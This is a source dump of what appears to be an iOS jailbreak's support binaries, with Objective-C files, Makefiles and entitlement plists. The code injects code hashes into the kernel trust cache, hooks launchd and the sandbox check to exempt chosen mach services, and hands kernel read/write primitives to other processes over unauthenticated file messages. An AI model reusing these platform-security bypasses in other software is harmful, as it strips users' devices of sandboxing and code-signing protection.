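//   -200 when the argument vector cannot be built (nil path, allocation
//     failure, or an argument that is not a string with a UTF-8 form).
int spawn(NSString* path, NSArray* args)
{
    if (!path) return -200;

    NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new];
    [argsM insertObject:path atIndex:0];

    NSUInteger argCount = [argsM count];
    // calloc so that a partially filled vector can be freed slot by slot
    char **argsC = (char **)calloc(argCount + 1, sizeof(char*));
    if (!argsC) return -200;

    BOOL argvComplete = YES;
    for (NSUInteger i = 0; i < argCount; i++)
    {
        id arg = [argsM objectAtIndex:i];
        const char *utf8 = [arg isKindOfClass:[NSString class]] ? [(NSString *)arg UTF8String] : NULL;
        argsC[i] = utf8 ? strdup(utf8) : NULL;
        if (!argsC[i]) {
            // Passing a truncated argv on would silently drop arguments
            argvComplete = NO;
            break;
        }
    }
    argsC[argCount] = NULL;

    pid_t task_pid = 0;
    int spawnError = -200;
    if (argvComplete) {
        spawnError = posix_spawn(&task_pid, path.fileSystemRepresentation, NULL, NULL, (char *const *)argsC, environ);
    }

    for (NSUInteger i = 0; i < argCount; i++)
    {
        free(argsC[i]);
    }
    free(argsC);
    if (spawnError != 0) return spawnError;

    int status = 0;
    do
    {
        if (waitpid(task_pid, &status, 0) == -1)
        {
            perror("waitpid");
            return -222;
        }
    } while (!WIFEXITED(status) && !WIFSIGNALED(status));

    if (WIFSIGNALED(status)) {
        JBLogDebug("Child terminated by signal %d", WTERMSIG(status));
        return 128 + WTERMSIG(status);
    }

    JBLogDebug("Child status %d", WEXITSTATUS(status));
    return WEXITSTATUS(status);
}
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/trustcache.h:
--------------------------------------------------------------------------------
#import "trustcache_structs.h"
#import

void dynamicTrustCacheAddEntry(trustcache_entry entry);
void dynamicTrustCacheRemoveEntry(trustcache_entry entry);
void fileEnumerateTrustCacheEntries(NSURL *fileURL, void (^enumerateBlock)(trustcache_entry entry));
void dynamicTrustCacheUploadFile(NSURL *fileURL);
void dynamicTrustCacheUploadCDHashFromData(NSData *cdHash);
void dynamicTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray);
void dynamicTrustCacheUploadDirectory(NSString *directoryPath);
void rebuildDynamicTrustCache(void);

BOOL trustCacheListAdd(uint64_t trustCacheKaddr);
BOOL trustCacheListRemove(uint64_t trustCacheKaddr);
uint64_t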
staticTrustCacheUploadFile(trustcache_file *fileToUpload, size_t fileSize, size_t *outMapSize); 16 | uint64_t staticTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray, size_t *outMapSize);; 17 | uint64_t staticTrustCacheUploadFileAtPath(NSString *filePath, size_t *outMapSize); 18 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache_structs.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | typedef struct sTrustcache_entry 6 | { 7 | uint8_t hash[CS_CDHASH_LEN]; 8 | uint8_t hash_type; 9 | uint8_t flags; 10 | } __attribute__((__packed__)) trustcache_entry; 11 | 12 | typedef struct sTrustcache_file 13 | { 14 | uint32_t version; 15 | uuid_t uuid; 16 | uint32_t length; 17 | trustcache_entry entries[]; 18 | } __attribute__((__packed__)) trustcache_file; 19 | 20 | typedef struct sTrustcache_page 21 | { 22 | uint64_t nextPtr; 23 | uint64_t selfPtr; 24 | trustcache_file file; 25 | } __attribute__((__packed__)) trustcache_page; 26 | 27 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/update.h: -------------------------------------------------------------------------------- 1 | #import 2 | NSString *trollStoreRootHelperPath(void); 3 | int basebinUpdateFromTar(NSString *basebinPath, bool rebootWhenDone); 4 | int jbUpdateFromTIPA(NSString *tipaPath, bool rebootWhenDone); -------------------------------------------------------------------------------- /BaseBin/jbctl/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbctl 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid 
-Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbctl/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.security.exception.mach-lookup.global-name 12 | 13 | com.opa334.jailbreakd 14 | 15 | com.apple.private.xpc.launchd.userspace-reboot 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/jbctl/rebuild_daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.trustcache_rebuild 9 | ProgramArguments 10 | 11 | basebin/jbctl 12 | rebuild_trustcache 13 | 14 | RunAtLoad 15 | 16 | StartCalendarInterval 17 | 18 | Hour 19 | 0 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /BaseBin/jbinit/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbinit 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -I../_shared -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist -Icom.apple.jbinit $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- 
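/BaseBin/jbinit/entitlements.plist:
--------------------------------------------------------------------------------
 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | get-task-allow 10 | 11 | com.apple.private.security.no-container 12 | 13 | 14 | 15 | 
--------------------------------------------------------------------------------
/BaseBin/jbinit/src/launchctl.h:
--------------------------------------------------------------------------------
#import

#ifndef launchctl_h
#define launchctl_h

#if defined(__cplusplus)
extern "C" {
#endif

extern int64_t launchctl_load(const char* plistPath, bool unload);

#if defined(__cplusplus)
}
#endif

#endif /* launchctl_h */
--------------------------------------------------------------------------------
/BaseBin/jbinit/src/launchctl.m:
--------------------------------------------------------------------------------
#import
#import
#import

#define ROUTINE_LOAD 800
#define ROUTINE_UNLOAD 801

// Asks launchd to load (unload == false) or unload (unload == true) the job
// described by the plist at plistPath, using the legacy-load message built
// below, and prints the reply.
//
// Returns 0 on success, the reply's "bootstrap-error" or "error" value when
// one of them is non-zero, and -1 when plistPath is NULL or the reply is
// missing or is not a dictionary (the reply accessors below must not be handed
// anything else).
int64_t launchctl_load(const char* plistPath, bool unload)
{
    if (!plistPath) return -1;

    xpc_object_t pathArray = xpc_array_create_empty();
    xpc_array_set_string(pathArray, XPC_ARRAY_APPEND, plistPath);

    xpc_object_t msgDictionary = xpc_dictionary_create_empty();
    xpc_dictionary_set_uint64(msgDictionary, "subsystem", 3);
    xpc_dictionary_set_uint64(msgDictionary, "handle", 0);
    xpc_dictionary_set_uint64(msgDictionary, "type", 1);
    xpc_dictionary_set_bool(msgDictionary, "legacy-load", true);
    xpc_dictionary_set_bool(msgDictionary, "enable", false);
    xpc_dictionary_set_uint64(msgDictionary, "routine", unload ? ROUTINE_UNLOAD : ROUTINE_LOAD);
    xpc_dictionary_set_value(msgDictionary, "paths", pathArray);

    xpc_object_t msgReply = launchd_xpc_send_message(msgDictionary);
    if (!msgReply || xpc_get_type(msgReply) != XPC_TYPE_DICTIONARY)
    {
        printf("msgReply missing or not a dictionary\n");
        return -1;
    }

    char *msgReplyDescription = xpc_copy_description(msgReply);
    if (msgReplyDescription)
    {
        printf("msgReply = %s\n", msgReplyDescription);
        free(msgReplyDescription);
    }

    int64_t bootstrapError = xpc_dictionary_get_int64(msgReply, "bootstrap-error");
    if(bootstrapError != 0)
    {
        printf("bootstrap-error = %s\n", xpc_strerror((int32_t)bootstrapError));
        return bootstrapError;
    }

    int64_t error = xpc_dictionary_get_int64(msgReply, "error");
    if(error != 0)
    {
        printf("error = %s\n", xpc_strerror((int32_t)error));
        return error;
    }

    // launchctl seems to do extra things here
    // like getting the audit token via xpc_dictionary_get_audit_token
    // or sometimes also getting msgReply["req_pid"] and msgReply["rec_execcnt"]
    // but we don't really care about that here

    return 0;
}

--------------------------------------------------------------------------------
/BaseBin/jbinit/src/main.m:
--------------------------------------------------------------------------------
#import
#import
#import
#import "launchctl.h"

// jbinit entry point.
//
//   jbinit start_idownload  moves the idownloadd plist out of Disabled/ and
//                           loads it (only when the disabled plist exists)
//   jbinit stop_idownload   unloads the idownloadd plist and moves it into
//                           Disabled/ (only when the enabled plist exists)
//   anything else           loads the jailbreakd and trustcache_rebuild jobs
//
// The job is no longer loaded from a path whose move just failed, and a failed
// move is reported on stdout.
// NOTE(review): the exit status stays 0 on every path, as before, so callers
// cannot observe a failed move or load - confirm whether they should.
int main(int argc, char* argv[])
{
    NSString *idownloaddEnabledPath = prebootPath(@"basebin/LaunchDaemons/com.opa334.idownloadd.plist");
    NSString *idownloaddDisabledPath = prebootPath(@"basebin/LaunchDaemons/Disabled/com.opa334.idownloadd.plist");
    if (argc == 2) {
        char *cmd = argv[1];
        NSFileManager *fileManager = [NSFileManager defaultManager];
        if (!strcmp(cmd, "start_idownload")) {
            if ([fileManager fileExistsAtPath:idownloaddDisabledPath]) {
                NSError *moveError = nil;
                if ([fileManager moveItemAtPath:idownloaddDisabledPath toPath:idownloaddEnabledPath error:&moveError]) {
                    launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, false);
                }
                else {
                    printf("failed to enable idownloadd plist: %s\n", moveError.localizedDescription.UTF8String);
                }
            }
            return 0;
        }
        else if (!strcmp(cmd, "stop_idownload")) {
            if ([fileManager fileExistsAtPath:idownloaddEnabledPath]) {
                launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, true);
                NSError *moveError = nil;
                if (![fileManager moveItemAtPath:idownloaddEnabledPath toPath:idownloaddDisabledPath error:&moveError]) {
                    // The plist stays in the enabled directory in this case
                    printf("failed to disable idownloadd plist: %s\n", moveError.localizedDescription.UTF8String);
                }
            }
            return 0;
        }
    }
    launchctl_load(prebootPath(@"basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation, false);
    launchctl_load(prebootPath(@"basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation, false);
    return 0;
}
--------------------------------------------------------------------------------
/BaseBin/launchdhook/Makefile:
--------------------------------------------------------------------------------
TARGET = launchdhook.dylib
CC = clang

CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2
LDFLAGS = -dynamiclib -rpath @loader_path/fallback -L../libjailbreak -L../_shared -ljailbreak -lellekit -lbsm -L../libfilecom -lfilecom

sign: $(TARGET)
	@ldid -S $^

$(TARGET): $(wildcard src/*.m ../systemhook/src/common.c ../systemhook/src/envbuf.c)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
	install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@
	install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/boomerang.h:
--------------------------------------------------------------------------------
void boomerang_userspaceRebootIncoming();
--------------------------------------------------------------------------------
/BaseBin/launchdhook/src/boomerang.m: 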
-------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | 8 | extern int (*posix_spawn_orig)(pid_t *restrict, const char *restrict, const posix_spawn_file_actions_t *restrict, const posix_spawnattr_t *restrict, char *const[restrict], char *const[restrict]); 9 | /* Unmounts /Developer, spawns basebin/boomerang through posix_spawn_orig and serves its file-based requests (getPPLRW, signThreadState) until it reports primitivesInitialized. Returns early if the spawn fails. */ 10 | void boomerang_userspaceRebootIncoming() 11 | { 12 | // Fix Xcode debugging being broken after the userspace reboot 13 | unmount("/Developer", MNT_FORCE); 14 | 15 | pid_t boomerangPid = 0; 16 | 17 | // Wait until boomerang process has initialized primitives 18 | dispatch_semaphore_t sema = dispatch_semaphore_create(0); 19 | FCHandler *handler = [[FCHandler alloc] initWithReceiveFilePath:prebootPath(@"basebin/.communication/boomerang_to_launchd") sendFilePath:prebootPath(@"basebin/.communication/launchd_to_boomerang")]; 20 | __weak FCHandler *weakHandler = handler; /* weak reference so the block stored on the handler does not retain the handler itself */ 21 | handler.receiveHandler = ^(NSDictionary *message) { /* NOTE(review): message fields are used as received. Nothing in this block identifies the sender or compares the pid field with boomerangPid, so access control on the two .communication files is the only gate visible here - confirm their ownership and mode. */ 22 | NSString *identifier = message[@"id"]; 23 | if (identifier) { 24 | if ([identifier isEqualToString:@"getPPLRW"]) { 25 | pid_t pid = [(NSNumber *)message[@"pid"] intValue]; /* no isKindOfClass: check; a missing pid key yields 0 */ 26 | int ret = handoffPPLPrimitives(pid); 27 | [weakHandler sendMessage:@{@"id" : @"receivePPLRW", @"errCode" : @(ret)}]; 28 | } 29 | else if ([identifier isEqualToString:@"signThreadState"]) { 30 | uint64_t actContextKptr = [(NSNumber*)message[@"actContext"] unsignedLongLongValue]; /* NOTE(review): the value is forwarded to signState unchanged; any validation would have to happen inside signState - verify */ 31 | signState(actContextKptr); 32 | [weakHandler sendMessage:@{@"id" : @"signedThreadState"}]; 33 | } 34 | else if ([identifier isEqualToString:@"primitivesInitialized"]) 35 | { 36 | dispatch_semaphore_signal(sema); // DONE, exit 37 | } 38 | } 39 | }; 40 | 41 | int ret = posix_spawn_orig(&boomerangPid, prebootPath(@"basebin/boomerang").fileSystemRepresentation, NULL, NULL, NULL, NULL); 42 | if (ret != 0) return; /* spawn failed: return without waiting */ 43 | 44 | dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER); /* waits with no timeout for the primitivesInitialized message */ 45 | } 46 |
-------------------------------------------------------------------------------- /BaseBin/launchdhook/src/crashreporter.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | typedef int exception_type_t; 4 | typedef integer_t exception_data_type_t; 5 | 6 | typedef struct { 7 | mach_msg_header_t header; 8 | mach_msg_body_t msgh_body; 9 | mach_msg_port_descriptor_t thread; 10 | mach_msg_port_descriptor_t task; 11 | int unused1; 12 | exception_type_t exception; 13 | exception_data_type_t code; 14 | int unused2; 15 | int subcode; 16 | NDR_record_t ndr; 17 | } exception_raise_request; // the bits we need at least 18 | 19 | typedef struct { 20 | mach_msg_header_t header; 21 | NDR_record_t ndr; 22 | kern_return_t retcode; 23 | } exception_raise_reply; 24 | 25 | typedef struct { 26 | mach_msg_header_t header; 27 | NDR_record_t ndr; 28 | kern_return_t retcode; 29 | int flavor; 30 | mach_msg_type_number_t new_stateCnt; 31 | natural_t new_state[614]; 32 | } exception_raise_state_reply; 33 | 34 | typedef enum { 35 | kCrashReporterStateNotActive = 0, 36 | kCrashReporterStateActive = 1, 37 | kCrashReporterStatePaused = 2 38 | } crash_reporter_state; 39 | 40 | void crashreporter_start(void); 41 | void crashreporter_pause(void); 42 | void crashreporter_resume(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.h: -------------------------------------------------------------------------------- 1 | void initDaemonHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import "substrate.h" 6 | #import 7 | #import 8 | #import 9 | #import 10 | 11 | extern xpc_object_t xpc_create_from_plist(const void *buf, size_t len); 12 | 13 | void 
xpc_dictionary_add_launch_daemon_plist_at_path(xpc_object_t xdict, const char *path) 14 | { /* Maps the file at path read-only, parses it with xpc_create_from_plist and, on success, stores the result in xdict under the key path. Any failure leaves xdict unchanged. */ 15 | int ldFd = open(path, O_RDONLY); /* NOTE(review): no ownership or mode check is made on the file before its contents are added to the dictionary - confirm the folders scanned by the hook below are writable by root only */ 16 | if (ldFd >= 0) { 17 | struct stat s = {}; 18 | if(fstat(ldFd, &s) != 0) { 19 | close(ldFd); 20 | return; 21 | } 22 | size_t len = s.st_size; 23 | void *addr = mmap(NULL, len, PROT_READ, MAP_FILE | MAP_PRIVATE, ldFd, 0); 24 | if (addr != MAP_FAILED) { 25 | xpc_object_t daemonXdict = xpc_create_from_plist(addr, len); 26 | if (daemonXdict) { 27 | xpc_dictionary_set_value(xdict, path, daemonXdict); 28 | } 29 | munmap(addr, len); 30 | } 31 | close(ldFd); 32 | } 33 | } 34 | /* Replacement for xpc_dictionary_get_value: calls the original, then for the key LaunchDaemons adds the two basebin plists plus every .plist found in the preboot Library/LaunchDaemons folder, and for the key Paths appends both folders. The hook applies to every dictionary and caller in the process; only the key string is matched. */ 35 | xpc_object_t (*xpc_dictionary_get_value_orig)(xpc_object_t xdict, const char *key); 36 | xpc_object_t xpc_dictionary_get_value_hook(xpc_object_t xdict, const char *key) 37 | { 38 | xpc_object_t origXdict = xpc_dictionary_get_value_orig(xdict, key); /* NOTE(review): origXdict is modified below without a NULL or type check */ 39 | if (!strcmp(key, "LaunchDaemons")) { 40 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, prebootPath(@"basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation); 41 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, prebootPath(@"basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation); 42 | for (NSString *daemonPlistName in [[NSFileManager defaultManager] contentsOfDirectoryAtPath:prebootPath(@"Library/LaunchDaemons") error:nil]) { /* directory listing errors are ignored; a nil result simply skips the loop */ 43 | if ([daemonPlistName.pathExtension isEqualToString:@"plist"]) { 44 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, [prebootPath(@"Library/LaunchDaemons") stringByAppendingPathComponent:daemonPlistName].fileSystemRepresentation); 45 | } 46 | } 47 | } 48 | else if (!strcmp(key, "Paths")) { /* NOTE(review): the appends below run on every lookup of Paths; no once-guard is visible in this file */ 49 | xpc_array_set_string(origXdict, XPC_ARRAY_APPEND, prebootPath(@"basebin/LaunchDaemons").fileSystemRepresentation); 50 | xpc_array_set_string(origXdict, XPC_ARRAY_APPEND, prebootPath(@"Library/LaunchDaemons").fileSystemRepresentation); 51 | } 52 | return origXdict; 53 | } 54 | 55 | void initDaemonHooks(void) 56 | {
57 | MSHookFunction(&xpc_dictionary_get_value, (void *)xpc_dictionary_get_value_hook, (void **)&xpc_dictionary_get_value_orig); 58 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/dsc_hook.h: -------------------------------------------------------------------------------- 1 | void initDSCHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/dsc_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "substrate.h" 4 | 5 | int (*sysctlbyname_orig)(const char *name, void *oldp, size_t *oldlenp, void *newp, size_t newlen); 6 | int sysctlbyname_hook(const char *name, void *oldp, size_t *oldlenp, void *newp, size_t newlen) 7 | { 8 | if (!strcmp(name, "vm.shared_region_pivot")) { 9 | return 0; 10 | } 11 | return sysctlbyname_orig(name, oldp, oldlenp, newp, newlen); 12 | } 13 | 14 | void initDSCHooks(void) 15 | { 16 | MSHookFunction(sysctlbyname, (void *)sysctlbyname_hook, (void **)&sysctlbyname_orig); 17 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.h: -------------------------------------------------------------------------------- 1 | void initIPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "substrate.h" 4 | 5 | int (*sandbox_check_by_audit_token_orig)(audit_token_t au, const char *operation, int sandbox_filter_type, ...); 6 | int sandbox_check_by_audit_token_hook(audit_token_t au, const char *operation, int sandbox_filter_type, ...) 
7 | { /* Replacement for sandbox_check_by_audit_token: returns 0 for mach-lookup checks on names starting with cy: or lh:, and forwards every other check to the original with the same arguments. */ 8 | va_list a; 9 | va_start(a, sandbox_filter_type); /* NOTE(review): ten variadic slots are read unconditionally below. When the caller passed fewer, the extra reads are undefined by the C standard; the values are only forwarded, never dereferenced here. */ 10 | const char *name = va_arg(a, const char *); 11 | const void *arg2 = va_arg(a, void *); 12 | const void *arg3 = va_arg(a, void *); 13 | const void *arg4 = va_arg(a, void *); 14 | const void *arg5 = va_arg(a, void *); 15 | const void *arg6 = va_arg(a, void *); 16 | const void *arg7 = va_arg(a, void *); 17 | const void *arg8 = va_arg(a, void *); 18 | const void *arg9 = va_arg(a, void *); 19 | const void *arg10 = va_arg(a, void *); 20 | va_end(a); 21 | if (name && operation) { 22 | if (strcmp(operation, "mach-lookup") == 0) { 23 | if (strncmp((char *)name, "cy:", 3) == 0 || strncmp((char *)name, "lh:", 3) == 0) { /* NOTE(review): the match is on the name prefix only; au and sandbox_filter_type are not consulted on this path, so the exemption applies to every client asking for such a name. Keep the prefix list as small as possible. */ 24 | /* always allow */ 25 | return 0; 26 | } 27 | } 28 | } 29 | return sandbox_check_by_audit_token_orig(au, operation, sandbox_filter_type, name, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10); 30 | } 31 | /* Installs the hook above with MSHookFunction and stores the original in sandbox_check_by_audit_token_orig. */ 32 | void initIPCHooks(void) 33 | { 34 | MSHookFunction(&sandbox_check_by_audit_token, (void *)sandbox_check_by_audit_token_hook, (void **)&sandbox_check_by_audit_token_orig); 35 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/spawn_hook.h: -------------------------------------------------------------------------------- 1 | void initSpawnHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/xpc_hook.h: -------------------------------------------------------------------------------- 1 | void initXPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/libfilecom/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libfilecom.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0
-fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name /var/jb/basebin/$(TARGET) -O2 6 | 7 | sign: $(TARGET) 8 | @ldid -S $< 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libfilecom/src/FCHandler.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface FCHandler : NSObject 4 | { 5 | NSString *_receiveFilePath; 6 | NSString *_sendFilePath; 7 | int _receiveFd; 8 | dispatch_source_t _dispatchSource; 9 | dispatch_queue_t _sendQueue; 10 | dispatch_queue_t _receiveQueue; 11 | BOOL _ignoreIncoming; 12 | } 13 | 14 | @property (nonatomic, copy) void (^receiveHandler)(NSDictionary *); 15 | 16 | - (instancetype)initWithReceiveFilePath:(NSString *)receiveFilePath sendFilePath:(NSString *)sendFilePath; 17 | 18 | - (BOOL)sendMessage:(NSDictionary *)message; 19 | - (void)receivedMessage:(NSDictionary *)message; 20 | 21 | 22 | @end -------------------------------------------------------------------------------- /BaseBin/libintl.8.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/libintl.8.dylib -------------------------------------------------------------------------------- /BaseBin/libjailbreak/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libjailbreak.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name /var/jb/basebin/$(TARGET) -O3 6 | LDFLAGS = -lbsm -L../libfilecom -lfilecom 7 | 8 
| sign: $(TARGET) 9 | @ldid -S $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.c src/*.S) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.h: -------------------------------------------------------------------------------- 1 | __kindof NSObject *bootInfo_getObject(NSString *name); 2 | void bootInfo_setObject(NSString *name, __kindof NSObject *object); 3 | 4 | uint64_t bootInfo_getUInt64(NSString *name); 5 | uint64_t bootInfo_getSlidUInt64(NSString *name); 6 | NSData *bootInfo_getData(NSString *name); 7 | NSArray *bootInfo_getArray(NSString *name); 8 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "util.h" 3 | 4 | #define BOOT_INFO_PATH prebootPath(@"basebin/boot_info.plist") 5 | 6 | void bootInfo_setObject(NSString *name, __kindof NSObject *object) 7 | { 8 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 9 | NSMutableDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil].mutableCopy ?: [NSMutableDictionary new]; 10 | if (object) { 11 | bootInfo[name] = object; 12 | } 13 | else { 14 | [bootInfo removeObjectForKey:name]; 15 | } 16 | [bootInfo writeToURL:bootInfoURL atomically:YES]; 17 | } 18 | 19 | __kindof NSObject *bootInfo_getObject(NSString *name) 20 | { 21 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 22 | NSDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil]; 23 | return bootInfo[name]; 24 | } 25 | 26 | uint64_t bootInfo_getUInt64(NSString *name) 27 | { 28 | NSNumber* num = bootInfo_getObject(name); 29 | if ([num 
isKindOfClass:NSNumber.class]) 30 | { 31 | return num.unsignedLongLongValue; 32 | } 33 | return 0; 34 | } 35 | 36 | uint64_t bootInfo_getSlidUInt64(NSString *name) 37 | { 38 | uint64_t kernelslide = bootInfo_getUInt64(@"kernelslide"); 39 | return bootInfo_getUInt64(name) + kernelslide; 40 | } 41 | 42 | NSData *bootInfo_getData(NSString *name) 43 | { 44 | NSData* data = bootInfo_getObject(name); 45 | if ([data isKindOfClass:NSData.class]) 46 | { 47 | return data; 48 | } 49 | return nil; 50 | } 51 | 52 | NSArray *bootInfo_getArray(NSString *name) 53 | { 54 | NSArray* array = bootInfo_getObject(name); 55 | if ([array isKindOfClass:NSArray.class]) 56 | { 57 | return array; 58 | } 59 | return nil; 60 | } -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/handoff.h: -------------------------------------------------------------------------------- 1 | int handoffPPLPrimitives(pid_t pid); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/jailbreakd.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | typedef enum { 5 | JBD_MSG_GET_STATUS = 0, 6 | JBD_MSG_PPL_INIT = 1, 7 | JBD_MSG_PAC_INIT = 2, 8 | JBD_MSG_PAC_FINALIZE = 3, 9 | 10 | JBD_MSG_HANDOFF_PPL = 10, 11 | JBD_MSG_DO_KCALL = 11, 12 | JBD_MSG_DO_KCALL_THREADSTATE = 12, 13 | JBD_MSG_INIT_ENVIRONMENT = 13, 14 | JBD_MSG_JBUPDATE = 14, 15 | 16 | JBD_MSG_REBUILD_TRUSTCACHE = 20, 17 | JBD_MSG_SETUID_FIX = 21, 18 | JBD_MSG_PROCESS_BINARY = 22, 19 | JBD_MSG_PROC_SET_DEBUGGED = 23, 20 | JBD_MSG_DEBUG_ME = 24, 21 | JBD_MSG_FORK_FIX = 25, 22 | JBD_MSG_INTERCEPT_USERSPACE_PANIC = 26, 23 | 24 | JBD_SET_FAKELIB_VISIBLE = 30, 25 | 26 | JBD_BINDMOUNT_PATH = 101, 27 | JBD_BINDUNMOUNT_PATH = 102, 28 | } JBD_MESSAGE_ID; 29 | 30 | typedef enum { 31 | JBD_ERR_PRIMITIVE_NOT_INITIALIZED = 0, 32 | JBD_ERR_NOT_PERMITTED = 1, 33 | } JBD_ERR_ID; 34 | 35 | typedef struct { 
